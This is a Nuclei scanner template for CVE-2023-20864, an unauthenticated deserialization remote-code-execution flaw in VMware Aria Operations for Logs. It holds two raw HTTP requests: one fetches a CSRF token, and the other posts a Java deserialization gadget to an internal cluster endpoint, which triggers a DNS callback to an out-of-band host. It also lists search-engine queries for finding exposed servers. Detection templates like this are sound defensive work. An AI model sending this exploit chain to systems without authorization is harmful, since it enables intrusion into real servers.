nuclei-templates/http/cves/2023/CVE-2023-20864.yaml

70 lines
2.3 KiB
YAML

id: CVE-2023-20864
info:
name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
reference:
- https://www.vmware.com/security/advisories/VMSA-2023-0007.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20864
- https://github.com/Threekiii/CVE
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-20864
cwe-id: CWE-502
epss-score: 0.25579
epss-percentile: 0.96694
cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: vmware
product: aria_operations_for_logs
shodan-query:
- title:"vRealize Log Insight"
- http.title:"vrealize log insight"
fofa-query: title="vrealize log insight"
google-query: intitle:"vrealize log insight"
tags: cve2023,cve,vmware,aria,rce,oast
http:
- raw:
- |
GET /csrf HTTP/1.1
Host: {{Hostname}}
X-Csrf-Token: Fetch
- |
POST /api/v2/internal/cluster/applyMembership HTTP/1.1
Host: {{Hostname}}
X-CSRF-Token: {{xcsrftoken}}
Content-type: application/octet-stream
{{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- '"errorMessage":"Internal error'
extractors:
- type: kval
name: xcsrftoken
group: 1
internal: true
kval:
- "X_CSRF_Token"
# digest: 490a004630440220217a4161f5d33b558b5e1a5f9cc3022399c2917d68142b7efd0cbc2bef5b9416022021067a8d5837587fcb3fd09cd0f9a8687351646f3756e6dc7b47e1093c686c2e:922c64590222798bb761d5b6d8e72950